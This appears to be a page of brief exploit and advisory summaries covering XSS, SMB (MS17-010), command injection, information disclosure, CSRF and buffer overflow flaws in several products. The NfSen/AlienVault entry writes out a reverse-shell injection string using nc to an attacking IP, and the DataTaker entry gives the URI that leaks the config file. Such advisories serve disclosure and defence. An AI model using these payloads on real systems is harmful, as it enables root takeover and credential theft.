Sabai Discuss Wordpress Plugin is vulnerable to a stored XSS vulnerability. An attacker can exploit this vulnerability by creating a new question on the website and inserting malicious XSS code into the title field. This will allow the attacker to execute malicious code on the victim's browser.
XSS injection is possible via the Lync 2013 SDK and PowerShell. No user-interaction is required for the XSS to execute on the target machine. It will run regardless of whether or not they accept the message. The target only needs to be online. Additionally, by forcing a browse to a UNC path via the file URI it is possible to capture hashed user credentials for the current user.
MS17-010 exploit for Windows 2000 and later by sleepya is a vulnerability that allows attackers to gain access to a system by exploiting a vulnerability in the SMB protocol. The exploit uses the same bug as EternalRomance and EternalSynergy, so named pipe is needed. It has been tested on Windows 2016 x64, Windows 10 Pro Build 10240 x64, Windows 2012 R2 x64, Windows 8.1 x64, Windows 2008 R2 SP1 x64, Windows 7 SP1 x64, Windows 2008 SP1 x64, Windows 2003 R2 SP2 x64, Windows XP SP2 x64, Windows 8.1 x86, Windows 7 SP1 x86, Windows 2008 SP1 x86, Windows 2003 SP2 x86, Windows XP SP3 x86, and Windows 2000 SP4 x86.
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972. For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the 'Custom output format:' input box: '; nc -ne /bin/bash 10.100.1.2 443 # If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability.
DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations.
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system.
The web user (in AlienVault USB www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and therefore can be leverage for privilege escalation from the web user to full root privileges.
Easy File Sharing Web Server 7.2 is vulnerable to a buffer overflow vulnerability when handling a specially crafted GET request. This can be exploited to bypass DEP and execute arbitrary code by using a ROP chain.
Services By CQR